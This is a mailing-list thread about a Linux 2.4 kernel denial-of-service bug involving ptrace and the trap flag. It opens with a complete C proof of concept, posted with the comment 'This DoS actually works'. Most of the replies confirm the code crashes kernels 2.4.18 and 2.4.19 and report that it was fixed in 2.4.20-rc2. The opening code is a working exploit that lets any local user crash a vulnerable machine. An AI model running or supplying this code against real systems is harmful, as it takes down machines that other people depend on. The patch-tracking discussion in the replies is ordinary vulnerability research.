i386 linux kernel proof-of-concept DoS
Christophe Devine
#include <sys/ptrace.h>
struct user_regs_struct {
long ebx, ecx, edx, esi, edi, ebp, eax;
unsigned short ds, __ds, es, __es;
unsigned short fs, __fs, gs, __gs;
long orig_eax, eip;
unsigned short cs, __cs;
long eflags, esp;
unsigned short ss, __ss;
};
int main( void )
{
char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
void (* lcall7)( void ) = (void *) dos;
struct user_regs_struct d;
int pid;
if( ! ( pid = fork() ) )
{
usleep( 1000 );
(* lcall7)();
}
else
{
ptrace( PTRACE_ATTACH, pid, 0, 0 );
while( 1 )
{
wait( 0 );
ptrace( PTRACE_GETREGS, pid, 0, &d );
d.eflags = 0xFFFF; /* set TF flag */
ptrace( PTRACE_SETREGS, pid, 0, &d );
ptrace( PTRACE_SYSCALL, pid, 0, 0 );
}
}
return 1;
}
Luke Vogel
>
> /* This DoS actually works, so - USE AT YOUR OWN RISK ! */
>
Isn't this the OLD ptrace vulnerability that has been fixed since ...
ummm ... 2.4.2 or there abouts?
--
Regards
Luke
------
When I die, I want to die like my Grandmother who died peacefully
in her sleep. Not screaming like all the passengers in her car.
------
C.O.L.S FAQ - http://www.linuxsecurity.com/docs/colsfaq.html
------
Christophe Devine
> Isn't this the OLD ptrace vulnerability that has been fixed since ...
> ummm ... 2.4.2 or there abouts?
Not really;
"Linux Kernel 2.4 System Call TF Flag Denial Of Service Vulnerability"
http://online.securityfocus.com/bid/6115
--
Christophe Devine
Markus Weber
>
> http://online.securityfocus.com/bid/6115
>
yes, crashed my 2.4.18-3 redhat kernel :-)
2Host.com - Robert
Luke Vogel wrote:
>
> Christophe Devine wrote:
> >
> > /* This DoS actually works, so - USE AT YOUR OWN RISK ! */
> >
>
> Isn't this the OLD ptrace vulnerability that has been fixed since ...
> ummm ... 2.4.2 or there abouts?
>
Nope, this is still vulnerable. It'll work on at least 2.4.19.
--
Regards,
Robert McGregor - Email: admin@(remove)2host.com. Phone: 530-941-0690
Server admin, support & programing for shared & dedicated web servers
Secure, reliable hosting you expect and deserve! http://www.2host.com
2Host.com - Robert
"2Host.com - Robert" wrote:
>
> Luke Vogel wrote:
> >
> > Christophe Devine wrote:
> > >
> > > /* This DoS actually works, so - USE AT YOUR OWN RISK ! */
> > >
> >
> > Isn't this the OLD ptrace vulnerability that has been fixed since ...
> > ummm ... 2.4.2 or there abouts?
> >
>
> Nope, this is still vulnerable. It'll work on at least 2.4.19.
^^^^^^^^^^
That's to say, I have confirmed the above code works successfully on
Christophe Devine
> That's to say, I have confirmed the above code works successfully on
> 2.4.19.
This is indeed regrettable - I believed the kernel guys had properly fixed
this bug in 2.4.19; looks like they blew it.
Jem Berkes
>> >
>>
>> Isn't this the OLD ptrace vulnerability that has been fixed since ...
>> ummm ... 2.4.2 or there abouts?
>>
>
> Nope, this is still vulnerable. It'll work on at least 2.4.19.
I just tested it on 2.4.20 (released yesterday) and it appears that this
has been fixed. I can not crash my system with the supplied program.
--
Jem Berkes
http://www.pc-tools.net/
Windows, Linux & UNIX software
Jon Portnoy
>>> > /* This DoS actually works, so - USE AT YOUR OWN RISK ! */
>>> >
>>>
>>> Isn't this the OLD ptrace vulnerability that has been fixed since ...
>>> ummm ... 2.4.2 or there abouts?
>>>
>>
>> Nope, this is still vulnerable. It'll work on at least 2.4.19.
>
> I just tested it on 2.4.20 (released yesterday) and it appears that this
> has been fixed. I can not crash my system with the supplied program.
>
It was fixed as of 2.4.20-rc2 (and 2.2.23 is also fixed I believe).
--
Jon Portnoy
Wojtek Walczak
> It was fixed as of 2.4.20-rc2 (and 2.2.23 is also fixed I believe).
--
[ ] gminick (at) underground.org.pl http://gminick.linuxsecurity.pl/ [ ]
[ "Po prostu lubie poranna samotnosc, bo wtedy kawa smakuje najlepiej." ]